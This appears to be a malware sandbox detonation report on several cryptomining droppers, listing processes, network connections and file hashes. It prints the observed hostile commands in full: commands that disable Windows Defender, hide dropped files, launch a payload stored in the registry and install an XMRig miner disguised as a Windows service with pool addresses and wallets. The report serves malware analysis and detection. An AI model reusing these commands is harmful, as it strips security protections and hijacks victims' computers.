schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Perform\7za.exe
7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU
C:\Perform\update.exe
C:\Perform\update.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"
C:\Perform\Resources\NSudo.exe
C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\Defender.exe
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\nssm.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\7za.exe
C:\Perform\nssm.exe
nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"
C:\Perform\nssm.exe
nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffcf0474f50,0x7ffcf0474f60,0x7ffcf0474f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1420 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1644 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1700 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | palygamesconsutoria.blogspot.com | udp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | tcp |
| US | 8.8.8.8:53 | resources.blogblog.com | udp |
| US | 8.8.8.8:53 | www.blogger.com | udp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | udp |
| US | 8.8.8.8:53 | themes.googleusercontent.com | udp |
| NL | 142.251.39.97:443 | themes.googleusercontent.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | udp |
| NL | 104.80.225.205:443 | | tcp |
| GB | 51.132.193.104:443 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
Files
memory/4512-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat
| MD5 | 55f5a5033d59e83f200f78efd8cf9ffd |
| SHA1 | b153b8f0da50ffc56996bafa0be0610cec8b9d99 |
| SHA256 | d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041 |
| SHA512 | 9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047 |
C:\Users\Admin\AppData\Local\Temp\files.7z
| MD5 | 6380cb936d9229799750c4416ad99a81 |
| SHA1 | d1efa33ab91b12e336190774e616f5e420979201 |
| SHA256 | f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce |
| SHA512 | 3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970 |
C:\Users\Admin\AppData\Local\Temp\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
C:\Perform\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
memory/4920-171-0x0000000000000000-mapping.dmp
memory/3324-173-0x0000000000000000-mapping.dmp
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
C:\Perform\up.vbs
| MD5 | 9fc9cd6fff29c03e2b164cafe21543a1 |
| SHA1 | c348cd40f9e112413a2587ef3036628a056aee13 |
| SHA256 | b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1 |
| SHA512 | 1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b |
memory/3020-177-0x0000000000000000-mapping.dmp
memory/5104-178-0x0000000000000000-mapping.dmp
memory/4484-179-0x0000000000000000-mapping.dmp
C:\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
memory/3292-181-0x0000000000000000-mapping.dmp
C:\Perform\Defender.exe
| MD5 | 33dcb753b2236649ae2f13d898e8eb5d |
| SHA1 | f9be1a9b50b55d9244e20c8ea79ad276854f461c |
| SHA256 | f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160 |
| SHA512 | 7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731 |
memory/2116-183-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
memory/4804-185-0x0000000000000000-mapping.dmp
memory/3064-186-0x0000000000000000-mapping.dmp
memory/4584-187-0x0000000000000000-mapping.dmp
memory/4428-189-0x0000000000000000-mapping.dmp
\??\pipe\crashpad_3344_EMRHQGXFHJGRFGJT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral3
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
149s
Max time network
116s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1112 set thread context of 908 | N/A | C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe | C:\Windows\System32\svchost.exe |
| PID 868 set thread context of 840 | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | C:\Windows\System32\svchost.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {C3D27779-9F9E-400A-8C25-E38F8BB55C9F} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
Network
| Country | Destination | Domain | Proto |
| RU | 31.41.244.231:80 | | tcp |
| RU | 31.41.244.231:80 | | tcp |
Files
\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1012-83-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1012-85-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/1112-86-0x00000000003B0000-0x00000000009FF000-memory.dmp
memory/108-87-0x0000000002780000-0x0000000002DCF000-memory.dmp
memory/868-89-0x0000000000000000-mapping.dmp
memory/868-91-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/840-104-0x00000000FF27C6E0-mapping.dmp
memory/868-115-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/868-116-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/1088-118-0x0000000000000000-mapping.dmp
memory/1088-120-0x0000000000F00000-0x000000000154F000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220901-en
Max time kernel
152s
Max time network
149s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Usermode.exe" | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
"C:\Users\Admin\AppData\Local\Temp\Usermode.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\setup.exe" "C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping -n 3 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp" /SL5="$D0054,2411950,352768,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 86VwoTuZTDgF5trS4bcEkvXtoHhUySbTWaWD5K4chXXc6XEPtWSVJcB43EVa9fmhPwcXRDNJ1hY21QqQtH3MQShV1F4VWrX -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 8.253.135.112:80 | | tcp |
| US | 8.253.135.112:80 | | tcp |
| US | 13.107.21.200:443 | | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| NL | 104.80.225.205:443 | | tcp |
| US | 20.189.173.4:443 | | tcp |
| NL | 178.79.208.1:80 | | tcp |
| NL | 178.79.208.1:80 | | tcp |
| NL | 178.79.208.1:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
memory/4872-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
memory/4752-138-0x0000000000000000-mapping.dmp
memory/1264-135-0x0000000000000000-mapping.dmp
memory/1264-139-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4872-141-0x00000000009A0000-0x0000000000E50000-memory.dmp
memory/3092-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
memory/2208-142-0x0000000000000000-mapping.dmp
memory/2208-148-0x0000000003370000-0x00000000033E7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\ISDone.dll
| MD5 | f26684a0b0999413be6751f335603471 |
| SHA1 | dcd054328740c4bbf00e11b0b8f00a00f311898d |
| SHA256 | 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890 |
| SHA512 | d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e |
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\b2p.dll
| MD5 | ab35386487b343e3e82dbd2671ff9dab |
| SHA1 | 03591d07aea3309b631a7d3a6e20a92653e199b8 |
| SHA256 | c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2 |
| SHA512 | b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09 |
memory/2208-152-0x00000000035D0000-0x00000000035DF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
